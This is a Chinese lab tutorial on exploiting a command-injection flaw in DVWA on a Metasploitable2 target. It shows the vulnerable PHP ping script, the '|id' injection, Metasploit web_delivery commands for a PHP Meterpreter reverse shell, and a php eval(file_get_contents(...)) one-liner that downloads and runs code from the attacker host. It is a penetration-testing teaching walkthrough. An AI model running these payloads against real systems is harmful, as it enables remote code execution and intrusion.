Kali渗透测试之使用Metasploit对Web应用的攻击
Web应用程序的漏洞数量众多,这里我们以其中一个命令注入漏洞为例复现一下。这种漏洞源于Web应用程序没有对用户输入的内容进行准确的验证,从而导致操作系统执行了攻击者输入的命令。下面是一段运行在Metasploitable2靶机上的PHP脚本,它来自于DVWA,代码如下:
<html>
<body>
<form name="ping" action="#" method="post">
<input type="text" name="ip" size="30">
<input type="submit" value="submit" name="submit">
</form>
</body>
</html>首先是是一个带有输入框的页面代码,在浏览器中这段代码会被执行成一个如下图所示的页面:
当用户在 图中所示的文本框中输入一个IP地址,例如“127.0.0.1”,服务器会将这个值传递给下面的PHP脚本进行处理。
<?php
if(isset($_POST['submit'])){
$target = $_REQUEST['ip'];
$cmd = shell_exec('ping -c 3 '. $target);
}
?>该脚本会将用户输入的值“127.0.0.1”保存到变量$target中。这样一来,将‘ping -c 3’与其连接起来,系统要执行的命令就变成了以下形式:
shell_exec('ping -c 3 127.0.0.1');shell_exec()是PHP中执行系统命令的4个函数之一, 它通过shell环境执行命令,并且将完整的输出以字符串的方式返回。也就是说,PHP先运行一个shell环境,然后让shell进程运行命令,并且把所有输出以字符串形式返回,如果程序执行错误或者没有任何输出,则返回null。
这命令执行以后,PHP会调用操作系统对127.0.0.1这个IP地址执行ping操作,这里使用参数-c(指定ping操作的次数),是因为Linux在进行ping操作时不会自动停止,所以需要限制ping的次数。
正常情况,用户可以使用网站这个功能。但是这段代码编写并不安全,攻击者可以借此来执行除了ping之外的操作,而且很容易实现。攻击者接着系统命令的特性,在输入中国呢添加“|”或者“&&”管道符来执行其他命令。例如在Linux系统中,“|”是管道命令操作符。利用“|”将两个命令隔开,管道符左边命令的输出就会作为管道符右边命令的输入。如下图所示:
提交这个参数以后,系统会执行以下命令:
shell_exec('ping -c 3 127.0.0.1|id');实际上,这里一共执行了两条命令,分别是“ping -c 127.0.0.1”和“id”,第一条命令的输出会作为第二条命令的输入,但是第一条命令的结果不会显示,只有第二条命令的结果才会显示出来。这就是命令注入漏洞,当攻击者发现目标网站存在命令注入攻击漏洞以后,可以很轻易地实现对其进行渗透。
实 验 环 境
攻击机:Linux kali 5.10.0 IP: 192.168.68.125
服务器:Metasploitable2-Linux IP:192.168.68.205
接下来结合渗透工具Metasploit来完成一次攻击的示例,渗透的目标是运行了DVWA的Metasploitable2服务器。DVWA的“Command Execution”命令执行漏洞界面,如下图所示:
Metasploit中包含一个十分方便的模块web_delivery,它包含了以下功能:
- 生成一个木马程序
- 启动一个发布该木马程序的服务器
- 生成一条命令,当目标主机执行这条命令以后,就会连接服务器A,下载并执行该木马程序
实 验 步 骤
1. 在Kali中启动并进入msf6
输入如下命令:
┌──(kali?kali)-[~] └─$ msfconsole msf6 >
2. 启动web_delivery模块
msf6 > use exploit/multi/script/web_delivery
这个模块中涉及的参数如下图所示:
我们需要指定目标的类型,在本例中目标是一台运行着PHP语言编写的Web应用程序的Linux服务器,所以可将类型指定为PHP。使用“show targets”命令可以看到web_delivery模块所支持的类型,如下图所示:
3. 设置木马类型、木马主控端IP地址和端口
输入如下命令:
msf6 exploit(multi/script/web_delivery) > set target 1 msf6 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp msf6 exploit(multi/script/web_delivery) > set lhost 192.168.68.125 msf6 exploit(multi/script/web_delivery) > set lport 8888
结果如下图所示:
4. 执行run
输入run命令,模块web_delivery会启动服务器。如下图所示:
图中红框中的命令非常重要,它就是我们要在目标系统上运行的命令。
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.68.125:8080/E7mvRltiKXUbdQ', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false])));5. 在靶机DVWA中“Command Execution”页面中注入命令
输入一个由&&连接的IP地址和上面的命令,如下图所示:
点击“submit”按钮,目标系统就会下载并执行木马文件,之后会建立一个Meterpreter会话,如下图所示:
6. 在Kali中查看session
会话已经建立,但是该模块不会自动进入Meterpreter会话,我们可以使用sessions命令查看已经打开的活动会话,输入如下命令:
msf6 exploit(multi/script/web_delivery) > sessions
如下图所示:
执行如下命令,进入会话中:
msf6 exploit(multi/script/web_delivery) > sessions -i 1
下图演示了整个命令注入的完整过程:
到此这篇关于Kali渗透测试:使用Metasploit对Web应用的攻击的文章就介绍到这了,更多相关Kali渗透测试内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!
相关文章
本文介绍了如何安装和配置Git,以及如何将其与GitHub和Gitee等远程仓库进行关联,通过修改配置文件和生成SSH密钥,可以实现将本地项目同时推送到多个远程仓库2024-11-11
这篇文章主要介绍了Visual Studio中Git的简单使用,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下2020-11-11
使用matlab画图时,怎样才能调出顺眼的颜色呢?下面这篇文章主要给大家介绍了关于Matlab几个常用的绘图颜色搭配,文中通过图文介绍的非常详细,需要的朋友可以参考下2022-07-07
有些粗心大意的人转贴时,简单地把图片复制了过来。可如果该网站的图片设置为防止外部链接,我们遇到转载的好帖,又找不到原出处,难道只有哀叹的份么?2011-06-06
这篇文章主要介绍了树莓派安装mjpg-streamer使用摄像头,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下2021-03-03
git worktree 是 Git 命令,用于管理多分支工作区,这篇文章主要介绍了git worktree与分支依赖隔离,需要的朋友可以参考下2024-04-04
本文主要介绍了vscode调试container中的程序的方法步骤,文中通过示例代码介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们可以参考一下2022-03-03
如何在vscode中正确使用正则表达式进行文档内容的替换编辑
正则表达式是一种强大的模式匹配工具,它具有广泛的应用,包括数据清洗、文本处理、文件搜索等方面,这篇文章主要给大家介绍了关于如何在vscode中正确使用正则表达式进行文档内容的替换编辑,需要的朋友可以参考下2023-12-12
Azkaban报错-azkaban.executor.ExecutorManagerException: No acti
这篇文章主要介绍了Azkaban报错-azkaban.executor.ExecutorManagerException: No active executors found,本文给大家介绍的非常详细,需要的朋友可以参考下2020-05-05
这篇文章主要介绍了vscode中模糊搜索和替换案例解析,本文给大家介绍的非常详细,感兴趣的朋友跟随小编一起看看吧2024-06-06
最新评论